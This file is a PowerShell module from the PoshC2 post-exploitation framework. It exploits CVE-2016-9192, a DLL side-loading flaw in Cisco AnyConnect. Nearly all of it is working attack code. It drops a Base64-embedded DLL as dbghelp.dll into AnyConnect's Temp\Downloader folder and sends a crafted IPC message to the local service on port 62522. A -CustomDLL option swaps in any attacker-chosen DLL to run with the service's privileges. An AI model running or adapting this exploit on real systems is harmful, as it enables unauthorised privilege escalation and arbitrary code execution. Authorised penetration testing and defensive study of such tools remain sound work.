PoshC2_Python/Modules/CVE-2016-9192.ps1

<#
.Synopsis
Attempts to exploit CVE-2016-9192, a side-loading vulnerability in Cisco AnyConnect's vpnupdater
.DESCRIPTION
Attempts to exploit CVE-2016-9192, a side-loading vulnerability in Cisco AnyConnect's vpnupdater. This module drops a DLL to disk which only creates a file under the root of C: to prove the exploit works.
Script Author: Ben Turner @benpturner
POC: Proof-of-concept and initial code from https://github.com/serializingme/cve-2016-9192
.EXAMPLE
PS C:\> Invoke-CVE-2016-9192
.EXAMPLE
PS C:\> Invoke-CVE-2016-9192 -CustomDLL <path to dll>
#>
Function Invoke-CVE-2016-9192 {
# Optional path to a DLL to drop instead of the embedded proof-of-concept DLL.
param ($CustomDLL)
# Host and network artifacts this function produces (relevant for detection
# and clean-up):
#   - dbghelp.dll written to $DLLLocation (under ProgramData\...\Temp\Downloader)
#   - C:\CVE-2016-9192.txt, the success marker the embedded DLL is expected to create
#   - one TCP connection to 127.0.0.1:62522
# None of these are removed by this function (see the final Write-Output).
#
# Request message sent verbatim to the AnyConnect service on 127.0.0.1:62522.
# Field order and the length bytes are part of the wire format; the inline
# comments name each field, the ASCII values follow them.
[Byte[]] $payload =
0x4F, 0x43, 0x53, 0x43,
# Message header length
0x1A, 0x00,
# Message body length
0xE4, 0x00,
# IPC response
0xFF, 0xFF, 0xFF, 0xFF,
# Message user context
0x00, 0x00, 0x00, 0x00,
# Request message identifier
0x02, 0x00, 0x00, 0x00,
# Return IPC object
0x00, 0x00, 0x00, 0x00,
# Message type
0x01,
# Message identifier
0x02,
# File path
# C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
0x00, 0x01, # Type
0x00, 0x57, # Length
0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
0x78, 0x65, 0x00,
# Command line (command line should start with "CAC-" or other valid command)
# CAC-doesnt-matter
0x00, 0x02, # Type
0x00, 0x12, # Length
0x43, 0x41, 0x43, 0x2D, 0x64, 0x6F, 0x65, 0x73, 0x6E, 0x74, 0x2D, 0x6D,
0x61, 0x74, 0x74, 0x65, 0x72, 0x00,
# GUI desktop (not mandatory)
# WinSta0\Default
0x00, 0x04,
0x00, 0x10,
0x57, 0x69, 0x6E, 0x53, 0x74, 0x61, 0x30, 0x5C, 0x44, 0x65, 0x66, 0x61,
0x75, 0x6C, 0x74, 0x00,
# Use installed
# False
0x80, 0x05,
0x00, 0x00,
# Relocatable file path
# C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
0x00, 0x06,
0x00, 0x57,
0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
0x78, 0x65, 0x00
# Embedded proof-of-concept DLL, Base64-encoded. Replaced below when -CustomDLL is given.
$Base64Dll = "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
$Exploited = "C:\CVE-2016-9192.txt"
$TempFolder = "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp"
$TempPath = "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Downloader"
$DLLLocation = "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Downloader\dbghelp.dll"
# A custom DLL is read from disk and Base64-encoded by ConvertTo-Base64 (defined later in this file).
if ($CustomDLL) {
Write-Output "[.] Using custom DLL: $CustomDLL"
$Base64Dll = ConvertTo-Base64 $CustomDLL
}
# Create the Downloader directory when it does not exist yet.
$PathExists = Test-Path $TempPath
if (!$PathExists) {
New-Item $TempPath -ItemType Directory | Out-Null
}
# The DLL is written only when absent; an existing file at $DLLLocation is
# reused as-is — only its presence is checked, not its contents.
$PathExists = Test-Path $DLLLocation
if (!$PathExists) {
Write-Output "[.] Dropping DLL to disk: $DLLLocation"
$fileBytes = [Convert]::FromBase64String($Base64Dll)
[io.file]::WriteAllBytes($DLLLocation, $fileBytes)
} else {
Write-Output "[.] Using DLL already in the following location: $DLLLocation"
}
Write-Output "[.] Connecting to localhost on port 62522"
try
{
$socket = New-Object System.Net.Sockets.TcpClient( "127.0.0.1", "62522" )
Write-Output "[.] Sucessfully connected to localhost on port 62522"
}
catch
{
Write-Output "`n[-] Connection failed, is Cisco Anyconnect running"
# NOTE: 'exit' ends the calling script/host, not just this function.
exit -1
}
# Send the request as a single write and close the stream.
$stream = $socket.GetStream();
$stream.Write($payload,0,$payload.Length);
$stream.Flush();
$stream.Close();
# Give the service time to act before looking for the marker file.
Start-Sleep 2
# With a custom DLL there is no marker file to test for, so success is
# reported without verification; otherwise presence of $Exploited decides.
if ($CustomDLL) {
Write-Output "`n[+] Exploitted, custom DLL should have been executed!"
} else {
$PathExists = Test-Path $Exploited
if (!$PathExists) {
Write-Output "`n[-] Exploit failed!"
} else {
Write-Output "`n[+] Exploit successful! Target is vulnerable to CVE-2016-9192"
Write-Output "[+] To add a custom DLL use the following command: Invoke-CVE-2016-9192 -CustomDLL <Path to DLL>"
}
}
# No clean-up is performed: the directory and dropped DLL stay on disk.
Write-Output "[+] Manual removal of $TempFolder required"
}
function ConvertTo-Base64
{
    <#
    .SYNOPSIS
    Reads a file from disk and returns its contents as one Base64 string.
    .PARAMETER Source
    Path of the file to encode.
    .OUTPUTS
    System.String - Base64 encoding of the whole file (empty string for an empty file).
    #>
    param
    (
        [string] $Source
    )
    # 90000 is a multiple of 3, so every full chunk encodes without padding and
    # the per-chunk strings concatenate into one valid Base64 string.
    $chunkSize = 90000
    $chunk = New-Object byte[] $chunkSize
    $encoded = New-Object System.Text.StringBuilder
    $stream = [System.IO.File]::OpenRead($Source)
    while ($true)
    {
        $count = $stream.Read($chunk, 0, $chunkSize)
        [void]$encoded.Append([Convert]::ToBase64String($chunk, 0, $count))
        # A short read is taken as end of file; assumes Read fills the buffer
        # until EOF for regular files — confirm before reusing with other streams.
        if ($count -ne $chunkSize) { break }
    }
    $stream.Dispose()
    $encoded.ToString()
}